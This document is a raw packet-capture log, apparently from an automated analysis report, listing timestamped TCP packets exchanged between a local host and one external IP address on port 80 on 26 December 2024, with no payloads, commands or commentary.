                                                                                      Dec 26, 2024 12:05:15.239092112 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.239175081 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.239223957 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.240130901 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.240183115 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.240309000 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.240360022 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.241185904 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.241206884 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.241230965 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.241255999 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.242158890 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.242336988 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.242389917 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.243181944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.243231058 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.243248940 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.243290901 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.244256973 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.244303942 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.244376898 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.244416952 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.245243073 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.245295048 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.245331049 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.245369911 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.246268034 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.246331930 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.246427059 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.247356892 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.247407913 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.247497082 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.247543097 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.248414040 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.248434067 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.248466015 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.248495102 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.249325991 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.249444008 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.249507904 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.249578953 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.250375986 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.250461102 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.250508070 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.251511097 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.251562119 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.251662970 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.251709938 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.252516985 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.252564907 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.252598047 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.252708912 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.252975941 CET8049713185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.253456116 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.253504992 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.253536940 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.253607035 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.254451990 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.254502058 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.256006002 CET4971580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.375565052 CET8049715185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.375824928 CET4971580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.375942945 CET4971580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.411829948 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.411881924 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.411900997 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.411927938 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.412271023 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.412318945 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.412431955 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.412477970 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.412565947 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.412611008 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.413470984 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.413520098 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.413599014 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.413644075 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.414493084 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.414537907 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.414648056 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.414693117 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.415533066 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.415580988 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.415621996 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.415671110 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.416593075 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.416639090 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.416675091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.416719913 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.417618036 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.417665005 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.417701960 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.417747021 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.418663979 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.418710947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.418737888 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.418783903 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.419723988 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.419773102 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.419781923 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.419826984 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.420748949 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.420794010 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.420809031 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.420855045 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.421678066 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.421725035 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.421762943 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.421813965 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.422749043 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.422797918 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.422908068 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.422957897 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.423724890 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.423778057 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.423814058 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.423860073 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.424757957 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.424803019 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.424844027 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.424890041 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.425769091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.425816059 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.425864935 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.425914049 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.426820040 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.426867008 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.426898956 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.426970005 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.427835941 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.427889109 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.427947044 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.427990913 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.428863049 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.428908110 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.428956032 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.429001093 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.429884911 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.429932117 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.429969072 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.430012941 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.430900097 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.430948019 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.430984020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.431024075 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.432153940 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.432178020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.432198048 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.432223082 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.432965994 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.432986021 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.433012009 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.433026075 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.434060097 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.434130907 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.434144020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.434197903 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.434998035 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.435040951 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.435096979 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.435136080 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.436157942 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.436201096 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.436230898 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.436275005 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.437218904 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.437231064 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.437266111 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.438236952 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.438261986 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.438313007 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.439122915 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.439177036 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.439219952 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.439256907 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.440131903 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.440175056 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.440244913 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.440288067 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.441138029 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.441180944 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.441214085 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.441253901 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.442163944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.442286015 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.442329884 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.443183899 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.443228006 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.443301916 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.443357944 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.444236994 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.444287062 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.444312096 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.444358110 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.445230961 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.445272923 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.445352077 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.445395947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.446243048 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.446290970 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.446469069 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.446511984 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.447318077 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.447366953 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.447396994 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.447439909 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.448344946 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.448391914 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.448436975 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.449361086 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.449404955 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.449443102 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.449487925 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.450376034 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.450421095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.450480938 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.450525045 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.451711893 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.451841116 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.451886892 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.452550888 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.452572107 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.452599049 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.452629089 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.453510046 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.453582048 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.453589916 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.453627110 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.454499960 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.454616070 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.454670906 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.455487013 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.455534935 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.455619097 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.455662966 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.457037926 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.457082987 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.457175016 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.457221031 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.458121061 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.458244085 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.458295107 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.458955050 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.459002018 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.459005117 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.459044933 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.459698915 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.459757090 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.459758997 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.459806919 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.460598946 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.460649967 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.460803986 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.460850954 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.461639881 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.461688042 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.461724043 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.461769104 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.462791920 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.462836981 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.462897062 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.462941885 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.463691950 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.463741064 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.463741064 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.463792086 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.464693069 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.464735031 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.464766026 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.464806080 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.495620966 CET8049715185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.622538090 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.622638941 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.622705936 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.622940063 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.623039007 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.623111963 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.623188972 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.623956919 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.624003887 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.624074936 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.624120951 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.624973059 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.625085115 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.625241995 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.625293970 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.626065016 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.626163006 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.626198053 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.626211882 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.627111912 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.627155066 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.627201080 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.628253937 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.628367901 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.628370047 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.628413916 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.629167080 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.629215002 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.629246950 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.629287958 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.630146980 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.630196095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.630224943 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.630268097 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.631401062 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.631452084 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.631485939 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.631536007 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.632616043 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.632664919 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.632673025 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.632714987 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.633589029 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.633647919 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.633713007 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.633760929 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.634697914 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.634743929 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.634809971 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.634854078 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.635706902 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.635756016 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.636073112 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.636116982 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.636759996 CET8049708185.81.68.147192.168.2.5
